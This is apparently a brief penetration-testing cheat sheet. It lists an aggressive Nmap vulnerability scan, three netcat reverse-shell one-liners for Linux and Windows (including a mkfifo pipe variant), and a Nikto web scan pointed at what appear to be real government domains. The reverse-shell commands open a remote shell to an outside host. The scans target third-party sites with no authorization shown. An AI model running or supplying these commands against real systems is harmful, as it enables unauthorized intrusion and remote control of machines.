1. Nmap

nmap -sV -vv -O -T5 --script=vuln ip/subnet -oX filename.xml

Scans all services with version detection (-sV), detects the operating system (-O), uses the most aggressive timing template (-T5), runs the vulnerability-scanning scripts, and writes the output as XML to filename.xml (which can be opened later with Zenmap).

2. Reverse Shell

nc -e /bin/sh

nc -e C:\Windows\System32\cmd.exe

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f

3. Nikto

perl nikto.pl -host kkp.go.id;www.wpi.kkp.go.id -output ~/kkp/random -Format htm

Scans the target and writes the report in HTML format.